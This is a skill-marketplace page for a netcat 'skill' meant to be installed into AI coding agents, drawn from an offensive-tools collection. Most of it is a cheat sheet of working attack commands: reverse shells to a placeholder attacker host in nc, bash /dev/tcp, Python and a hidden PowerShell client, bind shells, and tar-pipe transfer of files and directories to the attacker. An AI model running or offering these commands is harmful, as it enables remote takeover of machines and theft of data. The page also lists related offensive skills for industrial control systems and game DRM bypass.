aeondave/netcat
offensive-tools/network/netcat/SKILL.md
Netcat (nc/ncat): TCP/UDP Swiss Army knife for reverse shells, bind shells, port checks, banner grabbing, file transfer, port forwarding, and listener setup. Use when catching reverse shells, sending bind shells, testing port connectivity, grabbing service banners, or transferring files without SCP/FTP.
$ install --global
skillsauthnpx skillsauth add aeondave/malskill netcatInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: May 19, 2026, 4:47 AM142.5s2 files scanned
SKILL.md
- name:
- netcat
- description:
- Netcat (nc/ncat): TCP/UDP Swiss Army knife for reverse shells, bind shells, port checks, banner grabbing, file transfer, port forwarding, and listener setup. Use when catching reverse shells, sending bind shells, testing port connectivity, grabbing service banners, or transferring files without SCP/FTP.
- license:
- GPL-2.0
- compatibility:
- Linux, macOS, Windows. Pre-installed on Linux/macOS. Windows: use ncat (from nmap package) or nc64.exe. ncat (Nmap's version) adds SSL support and is preferred.
- author:
- AeonDave
- version:
- 1.0
Netcat / ncat
TCP/UDP utility — shells, file transfer, port probing, port forwarding.
Quick Start
# Listener (catch reverse shell)
nc -lvnp 4444
# Connect to port (test connectivity / banner grab)
nc -nv 10.10.10.10 80
# Reverse shell (from target)
nc -e /bin/bash <attacker_ip> 4444
Core Flags
| Flag | Purpose |
|------|---------|
| -l | Listen mode |
| -v | Verbose |
| -n | No DNS resolution |
| -p <port> | Local port |
| -e <cmd> | Execute command on connect |
| -u | UDP mode |
| -w <sec> | Timeout |
| -z | Zero I/O mode (port scan) |
| -k | Keep listening after client disconnects (ncat) |
| --ssl | SSL/TLS (ncat only) |
Reverse Shells
# From Linux target (nc with -e)
nc -e /bin/bash <attacker> 4444
# From Linux target (nc without -e / busybox)
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <attacker> 4444 > /tmp/f
# From Windows target (ncat)
ncat -e cmd.exe <attacker> 4444
ncat -e powershell.exe <attacker> 4444
# Bash (no nc needed)
bash -i >& /dev/tcp/<attacker>/4444 0>&1
# Python
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("<attacker>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# PowerShell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('<attacker>',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Bind Shell (target listens, attacker connects)
# Target listens
nc -lvnp 4444 -e /bin/bash # Linux
ncat -lvnp 4444 -e cmd.exe # Windows
# Attacker connects
nc -nv <target_ip> 4444
Banner Grabbing / Port Check
# Banner grab
nc -nv 10.10.10.10 22
nc -nv 10.10.10.10 80
# Send HTTP request
echo -e "HEAD / HTTP/1.0\r\n\r\n" | nc -nv 10.10.10.10 80
# Quick port check (z flag)
nc -z -nv 10.10.10.10 22
nc -z -nv 10.10.10.10 1-1000 # port scan (slow; use nmap instead)
File Transfer
# Receiver (attacker)
nc -lvnp 9999 > received_file
# Sender (target)
nc -nv <attacker> 9999 < file_to_send
# Directory (tar pipe)
# Receiver
nc -lvnp 9999 | tar xvf -
# Sender
tar cvf - /path/to/dir | nc -nv <attacker> 9999
Port Forwarding (ncat)
# Forward local 8080 → remote 80
ncat -lvnp 8080 --sh-exec "ncat 10.10.10.10 80"
# Relay (ncat broker)
ncat -lvnp 4444 --broker
Shell Upgrade (after catching nc shell)
# On target (in nc shell)
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Background: Ctrl+Z
stty raw -echo; fg
# Set terminal size
export TERM=xterm
stty rows 40 cols 160
Resources
| File | When to load |
|------|--------------|
| references/shells.md | Full reverse shell one-liners for all languages, shell upgrade steps, Windows shells |
Related Skills
aeondave/offensive-linux-role
data-ai
VerifiedTrustedCommunity
Scoped routing: Linux operator; hosts, sessions, users, services, packages, logs, containers, SSH, network paths, privilege evidence.
4SKILL.mdUpdated Jun 5, 2026
aeondave/ics-technique
development
VerifiedTrustedCommunity
Offensive methodology for ICS/OT/SCADA environments in authorized industrial penetration testing and red team operations. Use when assessing PLCs, RTUs, HMIs, engineering workstations, historians, or field devices running Modbus, DNP3, EtherNet/IP, S7comm/S7+, Profinet, IEC 60870-5-104, BACnet, or OPC-UA. Covers passive OT network enumeration, protocol-level device interrogation, PLC coil/register read-write attacks, HMI session exploitation, historian and engineering workstation compromise, and safe escalation rules for critical infrastructure scope. Does not cover: general IT network exploitation (network-technique), physical hardware interfaces UART/JTAG/SPI (hardware-technique), wireless sensor network attacks (wireless-technique), RF/SDR signal analysis (hardware-ctf or wireless-technique), or CTF-framed ICS lab tasks (ics-ctf).
4SKILL.mdUpdated Jun 2, 2026
aeondave/game-technique
tools
VerifiedTrustedCommunity
Offensive methodology for authorized game security assessments, game client security research, and game-adjacent penetration testing in real-world engagements. Use when assessing game clients for cheating vulnerabilities, testing anti-cheat effectiveness, auditing game server protocols for score manipulation or economic fraud, reverse engineering game DRM or license validation, analyzing game save file protection, or assessing game mod/plugin security. Covers: process memory scanning and manipulation (Cheat Engine methodology), game binary reversing for license and DRM bypass, game network protocol analysis and packet replay, anti-cheat mechanism analysis, save file format reversing and tampering, speed hack and value injection techniques. Does NOT cover: CTF game challenges (game-ctf), game engine source code auditing (web-exploit-technique or vuln-search-technique for the backend), or general binary exploitation (pwn-ctf or reversing-technique).
4SKILL.mdUpdated Jun 2, 2026
aeondave/hardware-technique
development
VerifiedTrustedCommunity
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
4SKILL.mdUpdated Jun 2, 2026